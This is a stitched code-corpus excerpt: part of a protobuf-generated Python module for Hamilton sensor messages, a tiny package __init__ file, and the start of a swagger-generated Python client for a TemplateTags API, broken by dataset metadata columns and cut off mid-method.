number=1, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='flags', full_name='xbospb.Hamilton3C.flags', index=1,
number=2, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='acc_x', full_name='xbospb.Hamilton3C.acc_x', index=2,
number=3, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='acc_y', full_name='xbospb.Hamilton3C.acc_y', index=3,
number=4, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='acc_z', full_name='xbospb.Hamilton3C.acc_z', index=4,
number=5, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='mag_x', full_name='xbospb.Hamilton3C.mag_x', index=5,
number=6, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='mag_y', full_name='xbospb.Hamilton3C.mag_y', index=6,
number=7, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='mag_z', full_name='xbospb.Hamilton3C.mag_z', index=7,
number=8, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tmp_die', full_name='xbospb.Hamilton3C.tmp_die', index=8,
number=9, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tmp_voltage', full_name='xbospb.Hamilton3C.tmp_voltage', index=9,
number=10, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='air_temp', full_name='xbospb.Hamilton3C.air_temp', index=10,
number=11, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='air_hum', full_name='xbospb.Hamilton3C.air_hum', index=11,
number=12, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='air_rh', full_name='xbospb.Hamilton3C.air_rh', index=12,
number=13, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='light_lux', full_name='xbospb.Hamilton3C.light_lux', index=13,
number=14, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='buttons', full_name='xbospb.Hamilton3C.buttons', index=14,
number=15, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='occupancy', full_name='xbospb.Hamilton3C.occupancy', index=15,
number=16, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=121,
serialized_end=398,
)
_HAMILTON330 = _descriptor.Descriptor(
name='Hamilton330',
full_name='xbospb.Hamilton330',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='uptime', full_name='xbospb.Hamilton330.uptime', index=0,
number=1, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='flags', full_name='xbospb.Hamilton330.flags', index=1,
number=2, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='acc_x', full_name='xbospb.Hamilton330.acc_x', index=2,
number=3, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='acc_y', full_name='xbospb.Hamilton330.acc_y', index=3,
number=4, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='acc_z', full_name='xbospb.Hamilton330.acc_z', index=4,
number=5, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='mag_x', full_name='xbospb.Hamilton330.mag_x', index=5,
number=6, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='mag_y', full_name='xbospb.Hamilton330.mag_y', index=6,
number=7, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='mag_z', full_name='xbospb.Hamilton330.mag_z', index=7,
number=8, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tmp_die', full_name='xbospb.Hamilton330.tmp_die', index=8,
number=9, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tmp_voltage', full_name='xbospb.Hamilton330.tmp_voltage', index=9,
number=10, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='air_temp', full_name='xbospb.Hamilton330.air_temp', index=10,
number=11, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='air_hum', full_name='xbospb.Hamilton330.air_hum', index=11,
number=12, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='air_rh', full_name='xbospb.Hamilton330.air_rh', index=12,
number=13, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='light_lux', full_name='xbospb.Hamilton330.light_lux', index=13,
number=14, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='buttons', full_name='xbospb.Hamilton330.buttons', index=14,
number=15, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='occupancy', full_name='xbospb.Hamilton330.occupancy', index=15,
number=16, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=401,
serialized_end=679,
)
_HAMILTONBRLINKSTATS = _descriptor.Descriptor(
name='HamiltonBRLinkStats',
full_name='xbospb.HamiltonBRLinkStats',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='BadFrames', full_name='xbospb.HamiltonBRLinkStats.BadFrames', index=0,
number=1, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='LostFrames', full_name='xbospb.HamiltonBRLinkStats.LostFrames', index=1,
number=2, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='DropNotConnected', full_name='xbospb.HamiltonBRLinkStats.DropNotConnected', index=2,
number=3, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='SumSerialReceived', full_name='xbospb.HamiltonBRLinkStats.SumSerialReceived', index=3,
number=4, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='SumDomainForwarded', full_name='xbospb.HamiltonBRLinkStats.SumDomainForwarded', index=4,
number=5, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='SumDropNotConnected', full_name='xbospb.HamiltonBRLinkStats.SumDropNotConnected', index=5,
number=6, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='SumDomainReceived', full_name='xbospb.HamiltonBRLinkStats.SumDomainReceived', index=6,
number=7, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='SumSerialForwarded', full_name='xbospb.HamiltonBRLinkStats.SumSerialForwarded', index=7,
number=8, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PublishOkay', full_name='xbospb.HamiltonBRLinkStats.PublishOkay', index=8,
number=9, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PublishError', full_name='xbospb.HamiltonBRLinkStats.PublishError', index=9,
number=10, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=682,
serialized_end=950,
)
_HAMILTONBRMESSAGE = _descriptor.Descriptor(
name='HamiltonBRMessage',
full_name='xbospb.HamiltonBRMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='SrcMAC', full_name='xbospb.HamiltonBRMessage.SrcMAC', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='SrcIP', full_name='xbospb.HamiltonBRMessage.SrcIP', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PopID', full_name='xbospb.HamiltonBRMessage.PopID', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PopTime', full_name='xbospb.HamiltonBRMessage.PopTime', index=3,
number=4, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='BRTime', full_name='xbospb.HamiltonBRMessage.BRTime', index=4,
number=5, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='RSSI', full_name='xbospb.HamiltonBRMessage.RSSI', index=5,
number=6, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='LQI', full_name='xbospb.HamiltonBRMessage.LQI', index=6,
number=7, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='Payload', full_name='xbospb.HamiltonBRMessage.Payload', index=7,
number=8, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=953,
serialized_end=1095,
)
_HAMILTONDATA.fields_by_name['h3c'].message_type = _HAMILTON3C
DESCRIPTOR.message_types_by_name['HamiltonData'] = _HAMILTONDATA
DESCRIPTOR.message_types_by_name['Hamilton3C'] = _HAMILTON3C
DESCRIPTOR.message_types_by_name['Hamilton330'] = _HAMILTON330
DESCRIPTOR.message_types_by_name['HamiltonBRLinkStats'] = _HAMILTONBRLINKSTATS
DESCRIPTOR.message_types_by_name['HamiltonBRMessage'] = _HAMILTONBRMESSAGE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
HamiltonData = _reflection.GeneratedProtocolMessageType('HamiltonData', (_message.Message,), dict(
DESCRIPTOR = _HAMILTONDATA,
__module__ = 'hamilton_pb2'
# @@protoc_insertion_point(class_scope:xbospb.HamiltonData)
))
_sym_db.RegisterMessage(HamiltonData)
Hamilton3C = _reflection.GeneratedProtocolMessageType('Hamilton3C', (_message.Message,), dict(
DESCRIPTOR = _HAMILTON3C,
__module__ = 'hamilton_pb2'
# @@protoc_insertion_point(class_scope:xbospb.Hamilton3C)
))
_sym_db.RegisterMessage(Hamilton3C)
Hamilton330 = _reflection.GeneratedProtocolMessageType('Hamilton330', (_message.Message,), dict(
DESCRIPTOR = _HAMILTON330,
__module__ = 'hamilton_pb2'
# @@protoc_insertion_point(class_scope:xbospb.Hamilton330)
))
_sym_db.RegisterMessage(Hamilton330)
HamiltonBRLinkStats = _reflection.GeneratedProtocolMessageType('HamiltonBRLinkStats', (_message.Message,), dict(
DESCRIPTOR = _HAMILTONBRLINKSTATS,
__module__ = 'hamilton_pb2'
# @@protoc_insertion_point(class_scope:xbospb.HamiltonBRLinkStats)
))
_sym_db.RegisterMessage(HamiltonBRLinkStats)
HamiltonBRMessage = _reflection.GeneratedProtocolMessageType('HamiltonBRMessage', (_message.Message,), dict(
DESCRIPTOR = _HAMILTONBRMESSAGE,
__module__ = 'hamilton_pb2'
# @@protoc_insertion_point(class_scope:xbospb.HamiltonBRMessage)
))
_sym_db.RegisterMessage(HamiltonBRMessage)
# @@protoc_insertion_point(module_scope)
| 46.714035
| 2,393
| 0.734255
| 3,586
| 26,627
| 5.203012
| 0.063581
| 0.071605
| 0.067531
| 0.046307
| 0.790706
| 0.754315
| 0.750241
| 0.750241
| 0.748205
| 0.734002
| 0
| 0.054442
| 0.138393
| 26,627
| 569
| 2,394
| 46.796134
| 0.758827
| 0.016938
| 0
| 0.743446
| 1
| 0.001873
| 0.183635
| 0.15008
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.009363
| 0
| 0.009363
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
20301af85746591512c430a31cf7cea803cd2a2a
| 66
|
py
|
Python
|
api/namex/resources/auto_analyse/paths/__init__.py
|
sumesh-aot/namex
|
53e11aed5ea550b71b7b983f1b57b65db5a06766
|
[
"Apache-2.0"
] | 1
|
2020-02-21T05:49:14.000Z
|
2020-02-21T05:49:14.000Z
|
api/namex/resources/auto_analyse/paths/__init__.py
|
sumesh-aot/namex
|
53e11aed5ea550b71b7b983f1b57b65db5a06766
|
[
"Apache-2.0"
] | null | null | null |
api/namex/resources/auto_analyse/paths/__init__.py
|
sumesh-aot/namex
|
53e11aed5ea550b71b7b983f1b57b65db5a06766
|
[
"Apache-2.0"
] | null | null | null |
from .bc_name_analysis import *
from .xpro_name_analysis import *
| 22
| 33
| 0.818182
| 10
| 66
| 5
| 0.6
| 0.48
| 0.72
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121212
| 66
| 2
| 34
| 33
| 0.862069
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
203ef3d2bb3f25df9a10d37bf76e7aea63b42f80
| 67,928
|
py
|
Python
|
TweakApi/apis/template_tag_api.py
|
tweak-com-public/tweak-api-client-python
|
019f86da11fdb12683d516f8f37db5d717380bcc
|
[
"Apache-2.0"
] | null | null | null |
TweakApi/apis/template_tag_api.py
|
tweak-com-public/tweak-api-client-python
|
019f86da11fdb12683d516f8f37db5d717380bcc
|
[
"Apache-2.0"
] | null | null | null |
TweakApi/apis/template_tag_api.py
|
tweak-com-public/tweak-api-client-python
|
019f86da11fdb12683d516f8f37db5d717380bcc
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
tweak-api
Tweak API to integrate with all the Tweak services. You can find out more about Tweak at <a href='https://www.tweak.com'>https://www.tweak.com</a>, #tweak.
OpenAPI spec version: 1.0.8-beta.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class TemplateTagApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
    """
    Bind this API object to an ApiClient.

    :param api_client: client to use for all requests; when omitted (or
        falsy), the shared client from the default Configuration is used,
        creating one on first use.
    """
    config = Configuration()
    if not api_client:
        # Fall back to the configuration-wide shared client,
        # lazily creating it the first time it is needed.
        if not config.api_client:
            config.api_client = ApiClient()
        api_client = config.api_client
    self.api_client = api_client
def template_tags_change_stream_get(self, **kwargs):
    """
    Create a change stream.

    Synchronous by default; pass a `callback` keyword argument to make
    the request asynchronous, in which case the request thread is
    returned and the callback receives the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.template_tags_change_stream_get(callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str options:
    :return: file
        If the method is called asynchronously,
        returns the request thread.
    """
    # Ask the low-level call for the payload only, not the full
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # The helper dispatches identically for the sync and async
    # (callback) cases, so a single delegation covers both.
    return self.template_tags_change_stream_get_with_http_info(**kwargs)
def template_tags_change_stream_get_with_http_info(self, **kwargs):
    """
    Create a change stream.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.template_tags_change_stream_get_with_http_info(callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str options:
    :return: file
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword names this endpoint accepts, plus the framework-level extras.
    all_params = ['options']
    all_params.append('callback')
    all_params.append('_return_http_data_only')

    # NOTE: locals() snapshots self/kwargs/all_params at this exact point;
    # the loop below validates each caller-supplied kwarg and merges it
    # into this dict, after which the raw 'kwargs' entry is dropped.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method template_tags_change_stream_get" % key
            )
        params[key] = val
    del params['kwargs']

    collection_formats = {}

    resource_path = '/TemplateTags/change-stream'.replace('{format}', 'json')
    path_params = {}

    # 'options' is the only endpoint-specific parameter; it travels in the
    # query string.
    query_params = {}
    if 'options' in params:
        query_params['options'] = params['options']

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])

    # Authentication setting
    auth_settings = ['access_token']

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='file',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def template_tags_change_stream_post(self, **kwargs):
    """
    Create a change stream.

    Synchronous by default; pass a `callback` keyword argument to make
    the request asynchronous, in which case the request thread is
    returned and the callback receives the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.template_tags_change_stream_post(callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str options:
    :return: file
        If the method is called asynchronously,
        returns the request thread.
    """
    # Ask the low-level call for the payload only, not the full
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # The helper dispatches identically for the sync and async
    # (callback) cases, so a single delegation covers both.
    return self.template_tags_change_stream_post_with_http_info(**kwargs)
def template_tags_change_stream_post_with_http_info(self, **kwargs):
    """
    Create a change stream.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.template_tags_change_stream_post_with_http_info(callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str options:
    :return: file
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword names this endpoint accepts, plus the framework-level extras.
    all_params = ['options']
    all_params.append('callback')
    all_params.append('_return_http_data_only')

    # NOTE: locals() snapshots self/kwargs/all_params at this exact point;
    # the loop below validates each caller-supplied kwarg and merges it
    # into this dict, after which the raw 'kwargs' entry is dropped.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method template_tags_change_stream_post" % key
            )
        params[key] = val
    del params['kwargs']

    collection_formats = {}

    resource_path = '/TemplateTags/change-stream'.replace('{format}', 'json')
    path_params = {}

    query_params = {}

    header_params = {}

    form_params = []
    local_var_files = {}
    # Unlike the GET variant, 'options' is sent as a form field on POST.
    if 'options' in params:
        form_params.append(('options', params['options']))

    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])

    # Authentication setting
    auth_settings = ['access_token']

    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='file',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def template_tags_count_get(self, **kwargs):
    """
    Count instances of the model matched by where from the data source.

    Synchronous by default; pass a `callback` keyword argument to make
    the request asynchronous, in which case the request thread is
    returned and the callback receives the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.template_tags_count_get(callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str where: Criteria to match model instances
    :return: InlineResponse2001
        If the method is called asynchronously,
        returns the request thread.
    """
    # Ask the low-level call for the payload only, not the full
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # The helper dispatches identically for the sync and async
    # (callback) cases, so a single delegation covers both.
    return self.template_tags_count_get_with_http_info(**kwargs)
def template_tags_count_get_with_http_info(self, **kwargs):
    """
    Count instances of the model matched by where from the data source.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.template_tags_count_get_with_http_info(callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str where: Criteria to match model instances
    :return: InlineResponse2001
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword names this endpoint accepts, plus the framework-level extras.
    all_params = ['where']
    all_params.append('callback')
    all_params.append('_return_http_data_only')

    # NOTE: locals() snapshots self/kwargs/all_params at this exact point;
    # the loop below validates each caller-supplied kwarg and merges it
    # into this dict, after which the raw 'kwargs' entry is dropped.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method template_tags_count_get" % key
            )
        params[key] = val
    del params['kwargs']

    collection_formats = {}

    resource_path = '/TemplateTags/count'.replace('{format}', 'json')
    path_params = {}

    # Optional 'where' criteria travel in the query string.
    query_params = {}
    if 'where' in params:
        query_params['where'] = params['where']

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])

    # Authentication setting
